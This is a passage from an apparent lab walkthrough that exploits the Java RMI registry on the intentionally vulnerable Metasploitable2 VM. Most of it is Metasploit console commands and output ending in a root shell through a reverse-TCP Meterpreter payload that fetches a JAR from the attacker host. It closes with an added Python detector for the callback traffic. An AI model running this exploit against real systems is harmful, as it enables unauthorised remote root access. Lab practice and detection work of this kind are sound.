May 26, 2022
metasploitable2 exploit

What Is the Java RMI Registry Exploit?


Java_rmi

Java RMI (Remote Method Invocation) allows a Java object running on one machine to call a method of another Java object running on a different machine. In an nmap scan it can be seen running on port 1099.

1099/tcp open  java-rmi         Java RMI Registry

msf6 > search java rmi

Matching Modules
================

#   Name                                                  Disclosure Date  Rank       Check  Description
-   ----                                                  ---------------  ----       -----  -----------
0   exploit/multi/misc/java_jmx_server                    2013-05-22       excellent  Yes    Java JMX Server Insecure Configuration Java Code Execution
1   auxiliary/scanner/misc/java_jmx_server                2013-05-22       normal     No     Java JMX Server Insecure Endpoint Code Execution Scanner
2   auxiliary/gather/java_rmi_registry                                     normal     No     Java RMI Registry Interfaces Enumeration
3   exploit/multi/misc/java_rmi_server                    2011-10-15       excellent  Yes    Java RMI Server Insecure Default Configuration Java Code Execution
4   auxiliary/scanner/misc/java_rmi_server                2011-10-15       normal     No     Java RMI Server Insecure Endpoint Code Execution Scanner
5   exploit/multi/browser/java_rmi_connection_impl        2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation
6   exploit/multi/browser/java_signed_applet              1997-02-19       excellent  No     Java Signed Applet Social Engineering Code Execution
7   exploit/multi/http/jenkins_metaprogramming            2019-01-08       excellent  Yes    Jenkins ACL Bypass and Metaprogramming RCE
8   exploit/linux/misc/jenkins_java_deserialize           2015-11-18       excellent  Yes    Jenkins CLI RMI Java Deserialization Vulnerability
9   exploit/multi/browser/firefox_xpi_bootstrapped_addon  2007-06-27       excellent  No     Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
10  exploit/multi/http/totaljs_cms_widget_exec            2019-08-30       excellent  Yes    Total.js CMS 12 Widget JavaScript Code Injection


Interact with a module by name or index. For example info 10, use 10 or use exploit/multi/http/totaljs_cms_widget_exec

msf6 > use 3
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT      1099             yes       The target port (TCP)
SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT    8080             yes       The local port to listen on.
SSL        false            no        Negotiate SSL for incoming connections
SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.138.128  yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port


Exploit target:

Id  Name
--  ----
0   Generic (Java Payload)


msf6 exploit(multi/misc/java_rmi_server) > set rhost 192.168.138.129
rhost => 192.168.138.129
msf6 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.138.128:4444
[*] 192.168.138.129:1099 - Using URL: http://0.0.0.0:8080/6kEum7A3
[*] 192.168.138.129:1099 - Local IP: http://192.168.138.128:8080/6kEum7A3
[*] 192.168.138.129:1099 - Server started.
[*] 192.168.138.129:1099 - Sending RMI Header...
[*] 192.168.138.129:1099 - Sending RMI Call...
[*] 192.168.138.129:1099 - Replied to request for payload JAR
[*] Sending stage (58082 bytes) to 192.168.138.129
[*] Meterpreter session 1 opened (192.168.138.128:4444 -> 192.168.138.129:44124) at 2021-05-29 15:22:37 +0300
[*] 192.168.138.129:1099 - Server stopped.

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > shell
Process 1 created.
Channel 1 created.
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Access to the system has been obtained with root privileges.
If you wish, you can take a look at the Meterpreter commands.
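
The run above leaves a recognizable network pattern: right after the inbound connection to the registry on port 1099, the RMI host itself connects back to the same peer, first to fetch the payload JAR over HTTP (port 8080) and then to the handler (port 4444). The Python detection logic below is an added example, not part of the original post, and correlates those two directions in flow records. The record format, the 30-second window and the host 192.168.138.50 are assumptions, and the sample records are constructed.

```python
from datetime import datetime, timedelta

RMI_PORT = 1099                  # registry port reported by nmap on the page
WINDOW = timedelta(seconds=30)   # assumed correlation window

# Constructed flow records (not captured traffic): time, source, destination, dest port.
SAMPLE_FLOWS = """\
2021-05-29T15:22:30 192.168.138.128 192.168.138.129 1099
2021-05-29T15:22:31 192.168.138.129 192.168.138.128 8080
2021-05-29T15:22:36 192.168.138.129 192.168.138.128 4444
2021-05-29T15:25:00 192.168.138.50 192.168.138.129 1099
2021-05-29T15:40:00 192.168.138.129 192.168.138.50 8080
2021-05-29T15:41:00 192.168.138.129 192.168.138.1 53
"""


def parse_flows(text):
    """Parse whitespace-separated flow records, skipping malformed lines."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, src, dst, port = parts
        flows.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return sorted(flows)


def find_rmi_callbacks(flows, rmi_port=RMI_PORT, window=WINDOW):
    """Flag connections an RMI host opens back to a peer that just contacted its registry."""
    last_inbound = {}  # (rmi_host, client) -> time of latest inbound registry connection
    alerts = []
    for ts, src, dst, port in flows:
        if port == rmi_port:
            last_inbound[(dst, src)] = ts
            continue
        seen = last_inbound.get((src, dst))
        if seen is not None and ts - seen <= window:
            alerts.append({"rmi_host": src, "peer": dst, "callback_port": port,
                           "delay_s": int((ts - seen).total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in find_rmi_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

Legitimate RMI clients that export callback objects can produce the same shape of traffic, so known peers should be allow-listed and the window tuned to the environment.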
